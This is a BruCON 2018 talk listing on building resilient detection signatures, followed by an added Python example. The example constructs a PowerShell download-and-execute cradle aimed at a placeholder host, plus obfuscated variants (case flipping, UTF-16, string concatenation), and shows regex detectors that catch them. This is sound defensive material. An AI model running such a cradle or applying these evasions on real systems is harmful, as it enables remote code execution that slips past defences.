$SignaturesAreDead = “Long Live RESILIENT Signatures” wide ascii nocase

Presented at BruCON 0x0A (2018), Oct. 4, 2018, noon (60 minutes)

Signatures are dead, or so we're told. It's true that many items that are shared as Indicators of Compromise (file names/paths/sizes/hashes and network IPs/domains) are no longer effective. These rigid indicators break at the first attempt at evasion. Creating resilient detections that stand up to evasion attempts by dedicated attackers and researchers is challenging, but is possible with the right tools, visibility and methodical (read iterative) approach. As part of FireEye's Advanced Practices Team, we are tasked with creating resilient, high-fidelity detections that run across hundreds of environments and millions of endpoints. In this talk we will share insights on our processes and approaches to detection development, including practical examples derived from real-world attacks.
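The abstract's central claim, that a rigid indicator breaks at the first evasion attempt while a signature keyed on how the attack has to work keeps firing, as an added illustration that is not part of the talk and not FireEye's tooling. The sample command line, its evasion variants, the hash "IOC" and the two regex iterations are all constructed here for the example; the URL is a reserved `.invalid` name and resolves nowhere. The two signature iterations imitate what YARA's `wide ascii nocase` modifiers (as in the talk title) buy you, and the step from v1 to v2 shows the iterative loop the abstract mentions: an evasion slips past, the signature is widened:

```python
import hashlib
import re

# ---------------------------------------------------------------------------
# Constructed sample data (not from the talk): a PowerShell download cradle
# and four trivial evasions of it. Everything here is made up for this
# example.
# ---------------------------------------------------------------------------
ORIGINAL = (
    "powershell -nop -w hidden -c "
    "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""
)

SAMPLES = {
    "original": ORIGINAL.encode("ascii"),
    # PowerShell is case-insensitive, so flipping case costs the attacker nothing
    "mixed_case": ORIGINAL.swapcase().encode("ascii"),
    # whitespace between tokens is free too
    "extra_spaces": ORIGINAL.replace(" ", "  \t ").encode("ascii"),
    # the same text stored as UTF-16LE, as it may appear in memory, in a
    # registry value or in a Unicode script file ("wide" in YARA terms)
    "wide": ORIGINAL.encode("utf-16-le"),
    # string concatenation splits the token a naive signature keys on;
    # PowerShell accepts a parenthesised expression as a member name
    "concat": ORIGINAL.replace(
        ".DownloadString(", ".('Down'+'loadString')("
    ).encode("ascii"),
}

# Rigid indicator: the SHA-256 of the one sample we have seen.
KNOWN_BAD_SHA256 = hashlib.sha256(SAMPLES["original"]).hexdigest()


def hash_ioc_detect(blob: bytes) -> bool:
    """Fires only on the exact bytes that were hashed."""
    return hashlib.sha256(blob).hexdigest() == KNOWN_BAD_SHA256


def text_views(blob: bytes):
    """Yield the blob as single-byte text and, when the length allows, as
    UTF-16LE text: the two views YARA's 'ascii wide' modifiers check."""
    yield blob.decode("latin-1")
    if len(blob) % 2 == 0:
        yield blob.decode("utf-16-le", errors="replace")


# Iteration 1: key on what the cradle has to do (build a WebClient and call
# DownloadString on it), case-insensitive, whitespace-tolerant, on both views.
CRADLE_V1 = re.compile(
    r"""new-object\s+(?:system\.)?net\.webclient\s*\)?\s*\.\s*downloadstring""",
    re.IGNORECASE,
)


def resilient_detect_v1(blob: bytes) -> bool:
    return any(CRADLE_V1.search(view) for view in text_views(blob))


# Iteration 2, written after the concatenation variant slipped past v1:
# normalise the cheap obfuscation away (collapse 'a'+'b' into 'ab') and let
# the member name be wrapped in ( and quotes.
CONCAT_GLUE = re.compile(r"""['"]\s*\+\s*['"]""")
CRADLE_V2 = re.compile(
    r"""new-object\s+(?:system\.)?net\.webclient\s*\)?\s*\.\s*\(?\s*['"]?downloadstring""",
    re.IGNORECASE,
)


def resilient_detect_v2(blob: bytes) -> bool:
    return any(
        CRADLE_V2.search(CONCAT_GLUE.sub("", view)) for view in text_views(blob)
    )


def evaluate(detector) -> dict:
    """Run one detector over every sample and report which variants it catches."""
    return {name: bool(detector(blob)) for name, blob in SAMPLES.items()}


if __name__ == "__main__":
    for label, det in [
        ("sha256 IOC", hash_ioc_detect),
        ("signature v1", resilient_detect_v1),
        ("signature v2", resilient_detect_v2),
    ]:
        print(f"{label:13s} {evaluate(det)}")
```

The hash fires on the original sample and nothing else; v1 survives case, whitespace and encoding changes but not concatenation; v2 catches all five. The point is not that v2 is finished (a further round of obfuscation, such as encoding or tick-insertion, would need another iteration) but that each iteration widens the signature around the behaviour the attacker cannot drop rather than around bytes the attacker can change for free.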

Presenters:

  • Matthew Dunwoody
    Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye’s Advanced Practices Team, where they research attacker activity and develop effective detection signatures and processes (among other things). Matthew previously worked as an Incident Response consultant with FireEye’s Mandiant consulting group, where he supported and led IR engagements and high-tech crime investigations. Daniel’s areas of expertise include IR investigations, host- and network-based detection research and development, and obfuscation and detection evasion research and tradecraft development. He is the author of the Invoke-Obfuscation, Invoke-CradleCrafter and Invoke-DOSfuscation obfuscation frameworks and the co-author of the Revoke-Obfuscation PowerShell obfuscation detection framework.
  • Daniel Bohannon (DBO)